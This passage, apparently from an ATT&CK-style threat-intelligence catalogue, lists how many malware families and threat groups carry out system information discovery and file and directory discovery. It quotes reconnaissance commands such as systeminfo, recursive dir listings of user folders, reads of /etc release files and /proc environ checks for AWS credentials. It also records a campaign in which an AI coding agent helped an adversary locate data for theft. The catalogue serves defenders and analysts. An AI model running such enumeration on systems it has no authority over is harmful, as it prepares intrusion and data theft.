OS version/Service pack. SynAck gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries. Comnie collects the hostname of the victim machine. BADCALL collects the computer name and host name on the compromised system. NavRAT uses <code>systeminfo</code> on a victim’s machine. yty gathers the computer name, CPU information, Microsoft Windows version, and runs the command <code>systeminfo</code>. Gold Dragon collects endpoint information using the <code>systeminfo</code> command. Koadic can obtain the OS version and build, computer name, and processor architecture from a compromised host. Zebrocy collects the OS version and computer name. Zebrocy also runs the <code>systeminfo</code> command to gather system information. Brave Prince collects hard drive content and system configuration information. RunningRAT gathers the OS version and processor information. PLAINTEE collects general system enumeration data about the infected machine and checks the OS version. VERMIN collects the OS name, machine name, and architecture information. InnaputRAT gathers system information. InvisiMole can gather information on the OS version, computer name, DEP policy, and memory size. QuasarRAT can gather system information from the victim’s machine including the OS type. OopsIE checks for information on the CPU fan, temperature, mouse, hard disk, and motherboard as part of its anti-VM checks. Kazuar gathers information on the system. TrickBot gathers the OS version, machine name, CPU type, amount of RAM available, and UEFI/BIOS firmware information from the victim’s machine. FELIXROOT collects the victim’s computer name, processor architecture, OS version, and system type. Bisonal has used commands and API calls to gather system information. RogueRobin gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name. KEYMARBLE has the capability to collect the computer name, language settings, the OS version, CPU information, and time elapsed since system start. NDiskMonitor obtains the victim computer name and encrypts the information to send over its C2 channel. UPPERCUT has the capability to gather the system’s hostname and OS version. MirageFox can collect CPU and architecture information from the victim’s machine. jRAT collects information about the OS (version, build type, install date) as well as system up-time upon receiving a connection from a backdoor. More_eggs has the capability to gather the OS version and computer name. Zeus Panda collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system. Agent Tesla can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system. Remcos can collect the OS version and process architecture of compromised hosts. DarkComet can collect the computer name, RAM used, and operating system version from the victim’s machine. BadPatch collects the OS system, OS version, MAC address, and the computer name from the victim’s machine. Micropsia gathers the hostname and OS version from the victim’s machine. Octopus can collect the computer name, OS version, and OS architecture information. Azorult can collect the machine information, system architecture, the OS version, computer name, Windows product name, the number of CPU cores, video card information, and the system language. OceanSalt can collect the computer name from the system. Cardinal RAT can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine. zwShell can obtain the victim PC name and OS version. Cannon can gather system information from the victim’s machine such as the OS version, and machine name. OSX_OCEANLOTUS.D collects processor information, memory information, computer name, hardware UUID, serial number, and operating system version. OSX_OCEANLOTUS.D has used the <code>ioreg</code> command to gather some of this information. NOKKI can gather information on the operating system on the victim’s machine. Denis collects OS information and the computer name from the victim’s machine. Final1stspy obtains victim Microsoft Windows version information and CPU architecture. KONNI can gather the OS version, architecture information, hostname, and RAM size information from the victim’s machine and has used <code>cmd /c systeminfo</code> command to get a snapshot of the current system state of the target machine. Empire can enumerate host system information like OS, architecture, domain name, applied patches, and more. Astaroth collects the machine name and keyboard language from the system. SpeakUp uses the <code>cat /proc/cpuinfo | grep -c “cpu family” 2>&1</code> command to gather system information. HOPLIGHT has been observed collecting victim machine information like OS version. PoshC2 contains modules, such as <code>Get-ComputerInfo</code>, for enumerating common system information. Revenge RAT collects the CPU information, OS information, and system language. StoneDrill has the capability to discover the system OS, Windows version, architecture and environment. FlawedAmmyy can collect the victim's operating system and computer name during the initial infection. ServHelper will attempt to enumerate Windows version and system architecture. Dridex has collected the computer name and OS architecture information from the system. njRAT enumerates the victim operating system and computer name during the initial infection. Ursnif has used Systeminfo to gather system information. KeyBoy can gather extended system information, such as information about the operating system and memory. YAHOYAH checks for the system’s Windows OS version and hostname. HAWKBALL can collect the OS version, architecture information, and computer name. LightNeuron gathers the victim computer name using the Win32 API call <code>GetComputerName</code>. OSX/Shlayer has collected the IOPlatformUUID, session UID, and the OS version using the command <code>sw_vers -productVersion</code>. Machete collects the hostname of the target computer. Fysbis has used the command <code>ls /etc | egrep -e"fedora\*|debian\*|gentoo\*|mandriva\*|mandrake\*|meego\*|redhat\*|lsb-\*|sun-\*|SUSE\*|release"</code> to determine which Linux OS version is running. ZxShell can collect the local hostname, operating system details, CPU speed, and total physical memory. BabyShark has executed the <code>ver</code> command. GRIFFON has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation . PoetRAT has the ability to gather information about the compromised host. HotCroissant has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host. Rifdoor has the ability to identify the Windows version on the compromised host. Okrum can collect computer name, locale information, and information about the OS and architecture. PowerShower has collected system information on the infected host. ShimRatReporter gathered the operating system name and specific Windows version of an infected machine. Lokibot has the ability to discover the computer name and Windows product name/version. Rising Sun can detect the computer name and operating system. Maze has checked the language of the infected system using the "GetUSerDefaultUILanguage" function. SHARPSTATS has the ability to identify the IP address, machine name, and OS of the compromised host. LoudMiner has monitored CPU usage. Pony has collected the Service Pack, language, and region information to send to the C2. Cadelspy has the ability to discover information about the compromised host. Metamorfo has collected the hostname and operating system version from the compromised host. Aria-body has the ability to identify the hostname, computer name, Windows version, processor speed, and machine GUID on a compromised host. Netwalker can determine the system architecture it is running on to choose which version of the DLL to use. Get2 has the ability to identify the computer name and Windows version of an infected host. SDBbot has the ability to identify the OS version, OS bit information and computer name. CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture. SYSCON has the ability to use Systeminfo to identify system information. TajMahal has the ability to identify hardware information, the computer name, and OS information on an infected host. Skidmap has the ability to check whether the infected system’s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use. Avenger has the ability to identify the OS architecture on a compromised host. BackConfig has the ability to gather the victim's computer name. Valak can determine the Windows version and computer name on a compromised host. Bundlore will enumerate the macOS version to determine which follow-on behaviors to execute using <code>/usr/bin/sw_vers -productVersion</code>. IcedID has the ability to identify the computer name and OS version on a compromised host. Carberp has collected the operating system version from the infected system. Bonadan has discovered the OS version, CPU model, and RAM size of the system it has been installed on. Kessel has collected the system architecture, OS version, and MAC address information. GoldenSpy has gathered operating system information. REvil can identify the username, machine name, system language, keyboard layout, and OS version on a compromised host. PipeMon can collect and send OS version and computer name as a part of its C2 beacon. Anchor can determine the hostname and linux version on a compromised host. FatDuke can collect the user name, Windows version, computer name, and available space on discs from a compromised host. LiteDuke can enumerate the CPUID and BIOS version on a compromised system. WellMess can identify the computer name of a compromised host. SoreFang can collect the hostname, operating system configuration, and product ID on victim machines by executing Systeminfo. BLINDINGCAN has collected from a victim machine the system name, processor information, and OS version. Grandoreiro can collect the computer name and OS version from a compromised host. Lucifer can collect the computer name, system architecture, default language, and processor frequency of a compromised host. SLOTHFULMEDIA has collected system name, OS version, adapter information, and memory usage from a victim machine. Bazar can fingerprint architecture, computer name, and OS version on the compromised host. Bazar can also check if the Russian language is installed on the infected machine and terminate if it is found. Spark can collect the hostname, keyboard layout, and language from the system. SharpStage has checked the system settings to see if Arabic is the configured language. DropBook has checked for the presence of Arabic language in the infected machine's settings. MoleNet can collect information about the about the system. Egregor can perform a language check of the infected system and can query the CPU information (cupid). Pay2Key has the ability to gather the hostname of the victim machine. SUNBURST collected hostname and OS version. Dtrack can collect the victim's computer name, hostname and adapter information to create a unique identifier. EVILNUM can obtain the computer name from the victim's system. Explosive has collected the computer name from the infected host. Caterpillar WebShell has a module to gather information from the compromised asset, including the computer version, computer name, IIS version, and more. AppleJeus has collected the victim host information after infection. Kerrdown has the ability to determine if the compromised host is running a 32 or 64 bit OS architecture. Penquin can report the file system type of a compromised host to C2. ShadowPad has discovered system information including memory status, CPU frequency, and OS versions. Hildegard has collected the host's OS, CPU, and memory information. Stuxnet collects system information including computer and domain names, OS version, and S7P paths. Industroyer collects the victim machine’s Windows GUID. SideTwist can collect the computer name of a targeted system. SombRAT can execute <code>getinfo</code> to enumerate the computer name and OS version of a compromised system. AppleSeed can identify the OS version of a targeted system. SodaMaster can enumerate the host name and OS version on a target system. Chaes has collected system information, including the machine name and OS version. GrimAgent can collect the OS, and build version on a compromised host. EnvyScout can determine whether the ISO payload was received by a Windows or iOS device. BoomBox can enumerate the hostname, domain, and IP of a compromised host. Kobalos can record the hostname and kernel version of the target machine. BADFLICK has captured victim computer name, memory space, and CPU details. ObliqueRAT has the ability to check for blocklisted computer names on infected endpoints. SpicyOmelette can identify the system name of a compromised host. Turian can retrieve system information including OS version, memory usage, local hostname, and system adapter information. SMOKEDHAM has used the <code>systeminfo</code> command on a compromised host. QakBot can collect system information including the OS version and domain on a compromised host. MarkiRAT can obtain the computer name from a compromised host. BLUELIGHT has collected the computer name and OS version from victim machines. XCSSET identifies the macOS version and uses <code>ioreg</code> to determine serial number. Diavol can collect the computer name and OS version from the system. Clambling can discover the hostname, computer name, and Windows version of a targeted machine. RCSession can gather system information from a compromised host. SysUpdate can collect a system's architecture, operating system version, and hostname. ThreatNeedle can collect system profile information from a compromised host. Gelsemium can determine the operating system and whether a targeted machine has a 32 or 64 bit architecture. Chrommme has the ability to obtain the computer name of a compromised host. KOCTOPUS has checked the OS version using `wmic.exe` and the `find` command. WarzoneRAT can collect compromised host information, including OS version, PC name, RAM size, and CPU details. DarkWatchman can collect the OS version, system architecture, and computer name. CharmPower can enumerate the OS version and computer name on a targeted system. Ferocious can use <code>GET.WORKSPACE</code> in Microsoft Excel to determine the OS version of the compromised host. LitePower has the ability to enumerate the OS architecture. Lizar can collect the computer name from the machine. Cyclops Blink has the ability to query device information. Meteor has the ability to discover the hostname of a compromised host. Green Lambert can use `uname` to identify the operating system name, version, and processor type. Neoichor can collect the OS version and computer name from a compromised host. SILENTTRINITY can collect information related to a compromised host, including OS version. CaddyWiper can use `DsRoleGetPrimaryDomainInformation` to determine the role of the infected machine. CaddyWiper can also halt execution if the compromised host is identified as a domain controller. HermeticWiper can determine the OS version and bitness on a targeted host. ZxxZ has collected the host name and operating system product name from a compromised machine. Milan can enumerate the targeted machine's name and GUID. MacMa can collect information about a compromised computer, including: Hardware UUID, Mac serial number, and macOS version. Saint Bot can identify the OS version, CPU, and other details from a victim's machine. Shark can collect the GUID of a targeted machine. Kevin can enumerate the OS version and hostname of a targeted machine. The IceApple Server Variable Dumper module iterates over all server variables present for the current request and returns them to the adversary. Amadey has collected the computer name and OS version from a compromised machine. Mongall can retrieve the hostname via `gethostbyname`. Action RAT has the ability to collect the hostname, OS version, and OS architecture of an infected host. AuTo Stealer has the ability to collect the hostname and OS information from an infected host. Squirrelwaffle has gathered victim computer information and configurations. PingPull can retrieve the hostname of a compromised host. StrifeWater can collect the OS version, architecture, and machine name to create a unique token for the infected host. STARWHALE can gather the computer name of an infected host. Bumblebee can enumerate the OS version and domain on a targeted system. macOS.OSAMiner can gather the device serial number. DEADEYE can enumerate a victim computer's volume serial number and host name. metaMain can collect the computer name from a compromised host. Mafalda can collect the computer name of a compromised host. SVCReady has the ability to collect information such as computer name, computer manufacturer, BIOS, operating system, and firmware, including through the use of `systeminfo.exe`. Woody RAT can retrieve the following information from an infected machine: OS, architecture, computer name, OS build version, and environment variables. DarkTortilla can obtain system information by querying the `Win32_ComputerSystem`, `Win32_BIOS`, `Win32_MotherboardDevice`, `Win32_PnPEntity`, and `Win32_DiskDrive` WMI objects. BlackCat can obtain the computer name and UUID. Black Basta can collect system boot configuration and CPU information. Royal can use `GetNativeSystemInfo` to enumerate system processors. RotaJakiro executes a set of commands to collect device information, including `uname`. Another example is the `cat /etc/*release | uniq` command used to collect the current OS distribution. BADHATCH can obtain current system information from a compromised machine such as the `SHELL PID`, `PSVERSION`, `HOSTNAME`, `LOGONSERVER`, `LASTBOOTUP`, OS type/version, bitness, and hostname. Sardonic has the ability to collect the computer name, and CPU manufacturer name from a compromised machine. Sardonic also has the ability to execute the `ver` and `systeminfo` commands. Snip3 has the ability to query `Win32_ComputerSystem` for system information. Ninja can obtain the computer name and information on the OS from targeted hosts. NKAbuse conducts multiple system checks and includes these in subsequent "heartbeat" messages to the malware's command and control server. DarkGate will gather various system information such as domain, display adapter description, operating system type and version, processor type, and RAM amount. LITTLELAMB.WOOLTEA can check the type of Ivanti VPN device it is running on by executing `first_run()` to identify the first four bytes of the motherboard serial number. Mispadu collects the OS version, computer name, and language ID. SocGholish has the ability to enumerate system information including the victim computer name. Akira uses the <code>GetSystemInfo</code> Windows function to determine the number of processors on a victim machine. Raspberry Robin performs several system checks as part of anti-analysis mechanisms, including querying the operating system build number, processor vendor and type, video controller, and CPU temperature. Gootloader can inspect the User-Agent string in GET request header information to determine the operating system of targeted systems. LunarWeb can use WMI queries and shell commands such as systeminfo.exe to collect the operating system, BIOS version, and domain name of the targeted system. LunarMail can capture environmental variables on compromised hosts. Pikabot performs a variety of system checks and gathers system information, including commands such as <code>whoami</code>. Nightdoor gathers information on the victim system such as CPU and Computer name as well as device drivers. Raccoon Stealer gathers information on infected systems such as operating system, processor information, RAM, and display information. IMAPLoader uses WMI queries to gather information about the victim machine. Cuckoo Stealer can gather information about the OS version and hardware on compromised hosts. Covenant implants can gather basic information on infected systems. Manjusaka performs basic system profiling actions to fingerprint and register the victim system with the C2 controller. DUSTTRAP reads the value of the infected system's `HKLM\SYSTEM\Microsoft\Cryptography\MachineGUID` value. Latrodectus can gather operating system information. Solar can send basic information about the infected host to C2. AcidPour can identify various system locations and mapped devices on Linux systems as a precursor to wiping activity. SampleCheck5000 can create unique victim identifiers by using the compromised system’s computer name. Mango can collect the machine name of a compromised system which is later used as part of a unique victim identifier. OilBooster can identify the compromised system's hostname which is used to create a unique identifier. ShrinkLocker uses WMI queries to gather various information about the victim machine and operating system. BlackByte Ransomware gathers victim system information to generate a unique victim identifier. MagicRAT collects basic system information from victim machines. StrelaStealer variants collect victim system information for exfiltration. BOLDMOVE performs system survey actions following initial execution. LightSpy's second stage implant uses the `DeviceInformation` class to collect system information, including CPU usage, battery statistics, memory allocations, screen size, etc. Line Dancer can gather system configuration information by running the native `show configuration` command. Kapeka utilizes WinAPI calls and registry queries to gather system information. Troll Stealer can collect local system information. Gomir collects information on infected systems such as hostname, username, CPU, and RAM information. LockBit 2.0 can enumerate system information including hostname and domain information. StealBit can enumerate the computer name and domain membership of the compromised system. LockBit 3.0 can enumerate system hostname and domain. XLoader can collect system information and supported language information from the victim machine. Sagerunex gathers information from the infected system such as hostname. RansomHub can retrieve information about virtual machines. Lumma Stealer has gathered various system information from victim machines. RIFLESPINE can collect system information after installation on infected systems. PUBLOAD has collected and sent system information including volume serial number, computer name, and system uptime to designated C2. PUBLOAD has also used several commands executed in sequence via `cmd` in a short interval to gather system information about the infected host including `systeminfo`. PUBLOAD has decrypted shellcode that collects the computer name. Havoc can gather system information including hostname, domain, and OS details. SplatCloak has collected the Windows build number using the windows kernel API `RtlGetVersion` to determine if the response is 19000 or higher (Windows 10 version 2004 or later). TONESHELL has the ability to retrieve the name of the infected machine. RedLine Stealer can collect information about the local system. Qilin can detect whether a system is running FreeBSD, VMkernel (ESXi), Nutanix AHV, or a standard Linux distribution to enable platform-specific encryption behaviors. Medusa Ransomware has collected data from the SMBIOS firmware table using `GetSystemFirmwareTable`. InvisibleFerret has collected OS type, hostname and system version through the "pay" module. InvisibleFerret has also queried the victim device using Python scripts to obtain the User and Hostname. BeaverTail has been known to collect basic system information. BeaverTail has also collected data to include hostname and current timestamp prior to uploading data to the API endpoint `/uploads` on the C2 server. XORIndex Loader has the ability to collect the hostname, OS Username, Geolocation, and OS version of an infected host. HexEval Loader has identified the OS and MAC address of victim device through host fingerprinting scripting. SystemBC has collected username , build number and serial number, then sent the information to the C2 server. SystemBC has also gathered device name, operating system, and processor type. Diskpart can show information about the selected disk, partition, volume, or virtual hard disk (VHD). Shai-Hulud has gathered victim system information. GlassWorm has the ability to check the OS of the victim host. GlassWorm has checked whether the OS platform value includes `darwin` prior to execution of macOS specific scripts. PureCrypter can enumerate a targeted system's SerialNumber and Version. LODEINFO can disover machine information including OS architecture, the ANSI code page (ACP) identifier, and hostname. HiddenFace can enumerate the hostname and username of the compromised system. SPAWNCHIMERA has obtained system information such as release, uptime, and current time. NOOPLDR can discover the device ID and hostname from the targeted machine to use for encryption keys. IronWind can capture the OS version and computer name of the compromised host. The AshTag loader and AshenOrchestrator components can collect reconnaissance data from victim machines. Tsundere Botnet has collected the machine’s MAC address, total memory, GPU information and other system information. LAMEHUG has the ability to execute Windows commands returned from C2 to gather system information. RustyWater has gathered the victim machine’s computer name. LazyWiper has used `[System.Net.Dns]::GetHostName()` and `$env:COMPUTERNAME` to enumerate the hostname of a system and determine if it is a domain controller. 敵対者は、ファイルやディレクトリを列挙して環境を把握することがある。 Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. ファイル/ディレクトリの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and browse the victim file system. During Operation Honeybee, the threat actors used a malicious DLL to search for files with specific keywords. During Operation CuckooBees, the threat actors used `dir c:\\` to search for files. During Operation Wocao, threat actors gathered a recursive directory listing to find files and directories of interest. During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful. During Operation Dream Job, Lazarus Group conducted word searches within documents on a compromised host in search of security and financial matters. During the SolarWinds Compromise, APT29 obtained information about the configured Exchange virtual directory using `Get-WebServicesVirtualDirectory`. KV Botnet Activity gathers a list of filenames from the following locations during execution of the final botnet stage: <code>\/usr\/sbin\/</code>, <code>\/usr\/bin\/</code>, <code>\/sbin\/</code>, <code>\/pfrm2.0\/bin\/</code>, <code>\/usr\/local\/bin\/</code>. During SharePoint ToolShell Exploitation, threat actors leveraged commands to locate accessible file shares, backup paths, or SharePoint content. During Salesforce Data Exfiltration, threat actors queried customers' Salesforce environments to identify sensitive information for exfiltration. During Operation AkaiRyū, MirrorFace enumerated file system details in compromised environments. During the Anthropic AI-orchestrated Campaign, the adversary leveraged Claude Code to identify sensitive data within the victim environment for extraction. During the 2025 Poland Wiper Attacks, the adversaries obtained the contents of users’ directories using `dir /s /b C:\Users` command. Ke3chang uses command-line interaction to search files and directories. APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection. The group also searched a compromised DCCC computer for specific terms. Turla surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent. Turla RPC backdoors have also searched for files matching the <code>lPH*.dll</code> pattern. Darkhotel has used malware that searched for files with specific patterns. admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about files and directories: <code>dir c:\ >> %temp%\download</code> <code>dir "c:\Documents and Settings" >> %temp%\download</code> <code>dir "c:\Program Files\" >> %temp%\download</code> <code>dir d:\ >> %temp%\download</code> APT3 has a tool that looks for files and directories on the local file system. APT18 can list files information for specific directories. Lotus Blossom has used commands such as `dir` to examine the local filesystem of victim machines. Lazarus Group malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives. Sandworm Team has enumerated files on a compromised host. Dragonfly has used a batch script to gather folder and file names from victim hosts. A Patchwork payload has searched all fixed drives on the victim for files matching a specified list of extensions. Winnti Group has used a program named ff.exe to search for specific documents on compromised hosts. menuPass has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos. Gamaredon Group macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. Gamaredon Group has also used its backdoors to automatically list interesting files (such as Office documents) found on a system. Gamaredon Group has also identified directory trees, folders and files on the compromised host. APT32's backdoor possesses the capability to list files and directories on a machine. Sowbug identified and extracted all Word documents on a server by using a command containing * .doc and *.docx. The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim. Magic Hound malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents. BRONZE BUTLER has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal. MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET." Dark Caracal collected file listings of all default Windows directories. Leafminer used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files. Tropic Trooper has monitored files' modified time. APT38 have enumerated files and directories, or searched in specific locations within a compromised host. APT39 has used tools with the ability to search for files on a compromised host. Kimsuky has the ability to enumerate all files and directories on an infected system. Kimsuky has used a custom script with a function called CreateFileList() that can scan all filesystem drives, prioritizing C:\Users, to locate files and file extensions of interest that ultimately generates a file called `FileList.txt` saved within the victims %TEMP% Directory that contains the findings and the respective pathways. APT41 has executed <code>file /bin/pwd</code> on exploited victims, perhaps to return architecture related information. Inception used a file listing plugin to collect information about file and directories both on local and remote drives. Chimera has utilized multiple commands to identify data of interest in file and directory listings. Fox Kitten has used WizTree to obtain network files and directory listings. Sidewinder has used malware to collect information on files and directories. Windigo has used a script to check for the presence of files created by OpenSSH backdoors. HAFNIUM has searched file contents on a compromised host. Mustang Panda has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files. TeamTNT has used a script that checks `/proc/*/environ` for environment variables related to AWS. Confucius has used a file stealer that checks the Document, Downloads, Desktop, and Picture folders for documents and images with specific extensions. Aoqin Dragon has run scripts to identify file formats including Microsoft Word. LuminousMoth has used malware that scans for files in the Documents, Desktop, and Download folders and in other drives. Scattered Spider Spider enumerates a target organization for files and directories of interest, including source code, user provisioning, MFA device registration, network diagrams, and shared credentials in documents or spreadsheets. FIN13 has used the Windows `dir` command to enumerate files and directories in a victim's network. Volt Typhoon has enumerated directories containing vulnerability testing and cyber related content and facilities data such as construction drawings. ToddyCat has run scripts to enumerate recently modified documents having either a .pdf, .doc, .docx, .xls or .xlsx extension. APT5 has used the BLOODMINE utility to discover files with .css, .jpg, .png, .gif, .ico, .js, and .jsp extensions in Pulse Secure Connect logs. Winter Vivern delivered malicious JavaScript payloads capable of listing folders and emails in exploited email servers. RedCurl has searched for and collected files on local and network drives. Play has used the Grixba information stealer to list security files and processes. Velvet Ant has enumerated local files and folders on victim devices. UNC3886 has used `vmtoolsd.exe` to enumerate files on guest machines. Medusa Group has searched for files within the victim environment for encryption and exfiltration. Medusa Group has also identified files associated with remote management services. Contagious Interview has conducted key word searches within files and directories on a compromised hosts to identify files for exfiltration. MirrorFace has run commands to check the content of folders on compromised hosts and has specifically targeted files with .doc, .ppt, .xls, .jtd, .eml, .xps, and .pdf extensions. Taidoor can search for specific files. PlugX has a module to enumerate drives and find files recursively. PlugX has also checked the path from which it is running for specific parameters prior to execution. Ixeshe can list file and directory information. China Chopper's server component can list directory contents. Derusbi is capable of obtaining directory, file, and drive listings. Uroburos can search for specific files on a compromised system. An older version of CHOPSTICK has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o. BACKSPACE allows adversaries to search for files. NETEAGLE allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information. SPACESHIP identifies files and directories for collection by searching for specific file extensions or file modification time. FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on the local system and removable media. ADVSTORESHELL can list files and directories. PinchDuke searches for files created within a certain timeframe and whose file extension matches a predefined list. GeminiDuke collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs. CosmicDuke searches attached and mounted drives for file extensions and keywords that match a predefined list. MiniDuke can enumerate local drives. RARSTONE obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications. WinMM sets a WH_CBT Windows hook to search for and capture files on the victim. DustySky scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine. SHOTPUT has a command to obtain a directory listing. ELMER is capable of performing directory listings. 4H RAT has the capability to obtain file and directory listings. 3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory. BLACKCOFFEE has the capability to enumerate files. HTTPBrowser is capable of listing files, folders, and drives on a victim. OwaAuth has a command to list its directory and logical drives. Psylo has commands to enumerate all storage devices and to find all files that start with a particular string. MobileOrder has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history. A variant of Elise executes <code>dir C:\progra~1</code> when initially run. Misdat is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives. ZLib has the ability to enumerate files and drives. Kasidet has the ability to search for a given filename on a victim. BlackEnergy gathers a list of installed apps from the uninstall program Registry. It also gathers registered mail, browser, and instant messaging clients from the Registry. BlackEnergy has searched for given file types. Rover automatically searches for files on local drives based on a predefined list of file extensions. Epic recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\Temp directories. Backdoor.Oldrea collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files. Trojan.Karagany can enumerate files and directories on a compromised host. cmd can be used to find files and directories with native functionality such as <code>dir</code> commands. A module in Prikormka collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file. Crimson contains commands to list files and directories, as well as search for files matching certain extensions from a defined list. Pisloader has commands to list drives on the victim machine and to list file information for a given directory. Remsec is capable of listing contents of folders on the victim. Remsec also searches for custom network encryption software on victims. BBSRAT can list file and directory information. BADNEWS identifies files with certain extensions from USB devices, then copies them to a predefined directory. AutoIt backdoor is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg. TINYTYPHON searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions. USBStealer searches victim drives for files matching certain extensions (“.skr”,“.pkr” or “.key”) or names. PowerDuke has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space. Winnti for Windows can check for the presence of specific files prior to moving to the next phase of execution. StreamEx has the ability to enumerate drive types. ChChes collects the victim's %TEMP% directory path and version of Internet Explorer. Pteranodon identifies files matching certain file extension and copies them to subdirectories it created. RTM can check for specific files and directories associated with virtualization and malware analysis. MoonWind has a command to return a directory listing for a specified directory. RedLeaves can enumerate and search for files and directories. Cobalt Strike can explore files on a compromised system. SOUNDBITE is capable of enumerating and manipulating files and directories. XAgentOSX contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory. XAgentOSX contains the showBackupIosFolder function to check for IOS device backups by running <code>ls -la ~/Library/Application\ Support/MobileSync/Backup/</code>. Volgmer can list directories on a victim. FALLCHILL can search files on a victim. FinFisher enumerates directories and scans for certain files. POWRUNER may enumerate user directories on a victim. Pupy can walk through directories and recursively search for strings in files. Forfiles can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age) NETWIRE has the ability to search for files on the compromised host. JPIN can enumerate drives and their types. It can also change file permissions using cacls.exe. Hydraq creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives. Pasam creates a backdoor through which remote attackers can retrieve lists of files. Linfo creates a backdoor through which remote attackers can list contents of drives and search for files. CORALDECK searches for specified files. POORAIM can conduct file browsing. WINERACK can enumerate files and directories. Smoke Loader recursively searches through directories for files. Orz can gather victim drive information. Bandook has a command to list files on a system. CrossRAT can list all files on a system. Kwampirs collects a list of files and directories in C:\ with the command <code>dir /s /a c:\ >> "C:\windows\TEMP\[RANDOM].tmp"</code>. GravityRAT collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf. Proxysvc lists files in directories. Bankshot searches for files on the victim's machine. ROKRAT has the ability to gather a list of files and directories on the infected system. SynAck checks its directory location in an attempt to avoid launching in a sandbox. yty gathers information on victim’s drives and has a plugin for document listing. Gold Dragon lists the directories for Desktop, program files, and the user’s recently accessed files. Koadic can obtain a list of directories. Zebrocy searches for files that are 60mb and less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar. Zebrocy also runs the <code>echo %APPDATA%</code> command to list the contents of the directory. Zebrocy can obtain the current execution path as well as perform drive enumeration. Brave Prince gathers file and directory information from the victim’s machine. DDKONG lists files on the victim’s machine. InnaputRAT enumerates directories and obtains file attributes on a system. InvisiMole can list information about files in a directory and recently opened or used documents. InvisiMole can also search for specific files by supplied file mask. TYPEFRAME can search directories for files on the victim’s machine. Kazuar finds a specified directory, lists the files and metadata about those files. TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information. Bisonal can retrieve a file listing from the system. KEYMARBLE has a command to search for files on the victim’s machine. NDiskMonitor can obtain a list of all files and directories as well as logical drives. UPPERCUT has the capability to gather the victim's current directory. FruitFly looks for specific files and file types. jRAT can browse file systems. Zeus Panda searches for specific directories on the victim’s machine. Remcos can search for files on the infected machine. BadPatch searches for files with specific file extensions. Micropsia can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths. Octopus can collect information on the Windows directory and searches for compressed RAR files on the host. Azorult can recursively search for files in folders and collects files from the desktop with certain extensions. Seasalt has the capability to identify the drive type on a victim. OceanSalt can extract drive information from the endpoint and search files on the system. AuditCred can search through folders and files on the system. Cardinal RAT checks its current working directory upon execution and also contains watchdog functionality that ensures its executable is located in the correct path (else it will rewrite the payload). zwShell can browse the file system. Cannon can obtain victim drive information as well as a list of folders in C:\Program Files. Denis has several commands to search directories for files. A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together. Empire includes various modules for finding files of interest on hosts and network 